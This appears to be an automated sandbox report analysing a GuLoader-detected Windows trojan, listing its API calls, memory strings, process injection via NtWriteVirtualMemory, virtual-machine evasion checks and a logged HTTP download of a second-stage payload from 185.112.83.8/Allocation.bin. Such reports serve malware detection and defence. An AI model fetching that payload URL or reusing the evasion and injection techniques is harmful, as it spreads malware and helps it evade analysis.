                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                        Source: mixfive_20211216-221155.exeString found in binary or memory: https://www.digicert.com/CPS0
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005492436.000000001E71E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005443083.000000001E708000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006499863.000000001F57A000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005311100.000000001E646000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006136622.000000001F477000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005148881.000000001E581000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997128279.000000001F6AF000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997051603.000000001F63E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006342484.000000001F509000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.997223453.000000001F720000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: global trafficHTTP traffic detected: GET /Allocation.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 185.112.83.8Cache-Control: no-cache
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
                        Source: mixfive_20211216-221155.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_0040755C
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_00406D85
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_729B1BFF
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029AAA49
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A0FEB
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A77E0
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A9CFA
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A21DA
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A75CD
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A9E91
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A62BA
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A92DC
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A7AC8
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A021A
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A964E
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A6FD1
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A8B07
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A8F59
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A5F71
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A6F63
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A8C81
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A7C17
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A680A
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A9002
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A6832
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A6987
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A95A7
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A697E
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 12_2_000644F8
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 12_2_000609C0
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 12_2_00064A30
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 12_2_00069E50
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 12_2_00062E75
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 12_2_0006E5C9
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 12_2_00064D60
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 12_2_000A612F
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 12_2_000A6B00
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 12_2_000AED60
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 12_2_000A7170
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 12_2_000A9728
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 12_2_000A9808
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 12_2_00105C58
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 12_2_00107FB8
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 12_2_00102FE8
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 12_2_00102FE8
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 12_2_00102FE8
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A77E0 NtAllocateVirtualMemory,LoadLibraryA,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A9CFA NtWriteVirtualMemory,LoadLibraryA,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029AA562 NtProtectVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A62BA NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A92DC NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A021A NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A6FD1 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A8B07 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A8F59 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A6F63 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A8C81 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A680A NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A6832 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A6987 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A95A7 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A792B NtAllocateVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A697E NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess Stats: CPU usage > 98%
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004805288.000000001E100000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCourtesied.exe4 vs mixfive_20211216-221155.exe
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004805288.000000001E100000.00000004.00000001.sdmpBinary or memory string: OriginalFilename_.dll4 vs mixfive_20211216-221155.exe
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1006545439.0000000020590000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameCourtesied.exe4 vs mixfive_20211216-221155.exe
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1006545439.0000000020590000.00000004.00020000.sdmpBinary or memory string: OriginalFilename_.dll4 vs mixfive_20211216-221155.exe
                        Source: mixfive_20211216-221155.exe, 0000000C.00000003.945608436.0000000000A3F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCourtesied.exe4 vs mixfive_20211216-221155.exe
                        Source: mixfive_20211216-221155.exe, 0000000C.00000003.945608436.0000000000A3F000.00000004.00000001.sdmpBinary or memory string: OriginalFilename_.dll4 vs mixfive_20211216-221155.exe
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs mixfive_20211216-221155.exe
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1006136622.000000001F477000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCourtesied.exe4 vs mixfive_20211216-221155.exe
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1006896564.0000000020B60000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameCourtesied.exe4 vs mixfive_20211216-221155.exe
                        Source: mixfive_20211216-221155.exeStatic PE information: invalid certificate
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeFile read: C:\Users\user\Desktop\mixfive_20211216-221155.exeJump to behavior
                        Source: mixfive_20211216-221155.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: unknownProcess created: C:\Users\user\Desktop\mixfive_20211216-221155.exe "C:\Users\user\Desktop\mixfive_20211216-221155.exe"
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess created: C:\Users\user\Desktop\mixfive_20211216-221155.exe "C:\Users\user\Desktop\mixfive_20211216-221155.exe"
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess created: C:\Users\user\Desktop\mixfive_20211216-221155.exe "C:\Users\user\Desktop\mixfive_20211216-221155.exe"
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeFile created: C:\Users\user\AppData\Local\Temp\nsyE396.tmpJump to behavior
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@0/2
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_004021AA CoCreateInstance,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: mixfive_20211216-221155.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: Binary string: _.pdb source: mixfive_20211216-221155.exe, 0000000C.00000002.1004805288.000000001E100000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006545439.0000000020590000.00000004.00020000.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.945608436.0000000000A3F000.00000004.00000001.sdmp

                        Data Obfuscation:

                        barindex
                        Yara detected GuLoaderShow sources
                        Source: Yara matchFile source: 0000000C.00000000.813287233.0000000000560000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.816118549.00000000029A0000.00000040.00000001.sdmp, type: MEMORY
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_729B30C0 push eax; ret
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A0FEB push cs; ret
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A52B2 pushad ; retf
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A2EAB push ss; retf
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A1AFC push edx; retf
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A57BD push ecx; iretd
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A23DB push ecx; retf
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A2FCD push ss; retf
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A37E9 push ss; retf
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A2311 push ecx; retf
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A2F5D push ss; retf
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A5B71 pushad ; retf
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A54BE push A139D881h; retf
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A385B push ss; retf
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_029A2D1E push ds; retf
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 12_2_00062A48 push esp; ret
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 12_2_0006B530 push esp; iretd
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 12_2_000AD4D0 push cs; ret
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 12_2_000AF950 push eax; iretd
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 12_2_0010099C push 418B000Dh; ret
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_729B1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeFile created: C:\Users\user\AppData\Local\Temp\nsiE423.tmp\System.dllJump to dropped file
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion:

                        barindex
                        Tries to detect Any.runShow sources
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeFile opened: C:\Program Files\qga\qga.exe
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeFile opened: C:\Program Files\qga\qga.exe
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                        Source: mixfive_20211216-221155.exe, 00000000.00000002.816191456.0000000002AA0000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1001528934.0000000000920000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1001528934.0000000000920000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTP://185.112.83.8/ALLOCATION.BIN
